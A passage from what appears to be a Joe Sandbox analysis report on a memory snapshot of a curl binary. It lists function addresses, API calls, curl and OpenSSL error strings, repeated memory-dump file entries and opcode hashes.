                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'
                                                                                                                                                                    • API String ID: 1927824332-1887007339
                                                                                                                                                                    • Opcode ID: ada16a9f6eee40493ee2bf987692e70359b53920611f1a7d9afce305081e344c
                                                                                                                                                                    • Instruction ID: 81d5704d828b1b5d22dd9956b43faa378eae2d384ab331dd26fa29fb61681640
                                                                                                                                                                    • Opcode Fuzzy Hash: ada16a9f6eee40493ee2bf987692e70359b53920611f1a7d9afce305081e344c
                                                                                                                                                                    • Instruction Fuzzy Hash: 5451E2716083058FCB14DF28E8C07AA77D0FB85315F09097AED49CB382E7759908CBA2
                                                                                                                                                                    Function 0020C1F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: select/poll error$server response timeout
                                                                                                                                                                    • API String ID: 1927824332-3916793193
                                                                                                                                                                    • Opcode ID: da7228b44b3b9c9b302ce39498b5dd2202ba424806bf391ea324182f502befd1
                                                                                                                                                                    • Instruction ID: 9428814137950ef5c0a94cca54322a95e8e91bbab6d032d2e812b45ae9fb6e37
                                                                                                                                                                    • Opcode Fuzzy Hash: da7228b44b3b9c9b302ce39498b5dd2202ba424806bf391ea324182f502befd1
                                                                                                                                                                    • Instruction Fuzzy Hash: 584137727147064FD714AFA9AC8067AB394EB85320F14077EED08D76C2EB62DD2483C1
                                                                                                                                                                    Function 001D6550 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Internal error clearing splay node = %d, xrefs: 001D65A8
                                                                                                                                                                    • Internal error removing splay node = %d, xrefs: 001D66C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Internal error clearing splay node = %d$Internal error removing splay node = %d
                                                                                                                                                                    • API String ID: 1927824332-979561979
                                                                                                                                                                    • Opcode ID: a91f2947cecb5889f0dd5202ed4858e5fb5b877fe267b8320f68c32e4f021c2d
                                                                                                                                                                    • Instruction ID: 60a64899855358073662c949c164227913b6c56eb3cb81e15713ac94f856ba13
                                                                                                                                                                    • Opcode Fuzzy Hash: a91f2947cecb5889f0dd5202ed4858e5fb5b877fe267b8320f68c32e4f021c2d
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F51F772A002058BDB28DF18ED4176AB7E5EB95314F05823EF80D8F785EB31E944CB91
                                                                                                                                                                    Function 002C3BFA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DecodePointer.KERNEL32(C4F4C774,00307BE0,00000024,0022AD87,00000016,%s(%d): OpenSSL internal error, assertion failed: %s,..\..\openssl\openssl\crypto\cryptlib.c,00000253,?,0022AA99,pointer != NULL,00000001,00000000,0022AADC,?,?), ref: 002C3CC0
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002C3D4C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$DecodeEncode
                                                                                                                                                                    • String ID: Pv6
                                                                                                                                                                    • API String ID: 3571222163-623033419
                                                                                                                                                                    • Opcode ID: 490ac48072eb2623c6e7581828617bd662730992875e1539c36632e0420be880
                                                                                                                                                                    • Instruction ID: df2f32c73c0a331384721b4f33428667498ac3197309f6f595f7c98779fa3ef7
                                                                                                                                                                    • Opcode Fuzzy Hash: 490ac48072eb2623c6e7581828617bd662730992875e1539c36632e0420be880
                                                                                                                                                                    • Instruction Fuzzy Hash: 87517B71E246069BCB15DF68D989FACBBB0BF05315F10CA1EE416B7250D7749E21CB90
                                                                                                                                                                    Function 001FF2E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0020C100: GetTickCount64.KERNEL32 ref: 0020C123
                                                                                                                                                                      • Part of subcall function 0020C100: GetTickCount64.KERNEL32 ref: 0020C17D
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001FF39C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: select/poll error$server response timeout
                                                                                                                                                                    • API String ID: 1927824332-3916793193
                                                                                                                                                                    • Opcode ID: 151f581d3bcdc9ba60498919d97fd9229923613a17bbb658dd90f9e4059ac1ad
                                                                                                                                                                    • Instruction ID: 19e67573f82200e7581efc87ca5fd4f2a1d8982543dbc4d468fe64db31512499
                                                                                                                                                                    • Opcode Fuzzy Hash: 151f581d3bcdc9ba60498919d97fd9229923613a17bbb658dd90f9e4059ac1ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 80412B7170420987DB289A24EC5167E73D9EF85315F14027EEA4AC7281FBA1DD07C291
                                                                                                                                                                    Function 001F2D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: select/poll error$server response timeout
                                                                                                                                                                    • API String ID: 1927824332-3916793193
                                                                                                                                                                    • Opcode ID: 3e2a90a8fb6acd3c1b20abf61cc24c5593d48eb8f72122b5295dd5a729bdb1d9
                                                                                                                                                                    • Instruction ID: 2cd2595e3db2ce1859707125d8d48d0611702d09606f35be970a10e34b92f8d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e2a90a8fb6acd3c1b20abf61cc24c5593d48eb8f72122b5295dd5a729bdb1d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F316D3270060A9BDB189A64DC52BBA7398AF55314F14023DEE1ADB6C2FB70ED55C3D2
                                                                                                                                                                    Function 001E5650 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\ssl_lib.c, xrefs: 001E56A9
                                                                                                                                                                    • SSL read: %s, errno %d, xrefs: 001E5757
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\ssl\ssl_lib.c$SSL read: %s, errno %d
                                                                                                                                                                    • API String ID: 0-3945649146
                                                                                                                                                                    • Opcode ID: 54493e9ff7efd1fc53b1629362a1f5692d755e5c6fa9350fd9c6aac4f4e0a53a
                                                                                                                                                                    • Instruction ID: 6eaaf15dc57c8c0e53052202857e35ebf3746cd3f2c10ec9b8869372f7066754
                                                                                                                                                                    • Opcode Fuzzy Hash: 54493e9ff7efd1fc53b1629362a1f5692d755e5c6fa9350fd9c6aac4f4e0a53a
                                                                                                                                                                    • Instruction Fuzzy Hash: 30313431E10A80CBD724DF24DC41B9EB7E6AF48318F504619ED598B2C2DB719D65CB92
                                                                                                                                                                    Function 001FC340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001FC361
                                                                                                                                                                      • Part of subcall function 001CCFC0: GetTickCount64.KERNEL32 ref: 001CCFC1
                                                                                                                                                                      • Part of subcall function 001FBF20: GetTickCount64.KERNEL32 ref: 001FBF39
                                                                                                                                                                    Strings
                                                                                                                                                                    • Preparing for accepting server on data port, xrefs: 001FC34E
                                                                                                                                                                    • Accept timeout occurred while waiting server connect, xrefs: 001FC383
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Accept timeout occurred while waiting server connect$Preparing for accepting server on data port
                                                                                                                                                                    • API String ID: 1927824332-3364268075
                                                                                                                                                                    • Opcode ID: fce35f8e109c9ae367b36e481b1d8c2b0ce46e5965eca704a389b2ef66083f72
                                                                                                                                                                    • Instruction ID: a3adaba87eaef183ada111abbec8aca525a5bff7c47ddee23cf75f272d24deed
                                                                                                                                                                    • Opcode Fuzzy Hash: fce35f8e109c9ae367b36e481b1d8c2b0ce46e5965eca704a389b2ef66083f72
                                                                                                                                                                    • Instruction Fuzzy Hash: B811023270520C06D72463797D826BE738AABE6395F08417BEA0CC2282FF609C0252E2
                                                                                                                                                                    Function 00238100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\mem_dbg.c, xrefs: 0023819B
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\mem_dbg.c, xrefs: 00238155
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\crypto\mem_dbg.c$..\..\openssl\openssl\crypto\mem_dbg.c
                                                                                                                                                                    • API String ID: 0-703416693
                                                                                                                                                                    • Opcode ID: 31cee26f0535b273970c3007ef7cd93debcc03fdaa77d2d0324ef349b24de250
                                                                                                                                                                    • Instruction ID: 4564f44fca6327b6e8f3689927ac2e2cc68d414c81032e55eaceddddb2fc83ff
                                                                                                                                                                    • Opcode Fuzzy Hash: 31cee26f0535b273970c3007ef7cd93debcc03fdaa77d2d0324ef349b24de250
                                                                                                                                                                    • Instruction Fuzzy Hash: 8811237476030357E716DF28DC81BA673A49B44700F488908F99C9B291EFF4C8A28791
                                                                                                                                                                    Function 001CD4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002BFD90: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000001,?,?,?,002DA609,00000001,00000000), ref: 002BFDD3
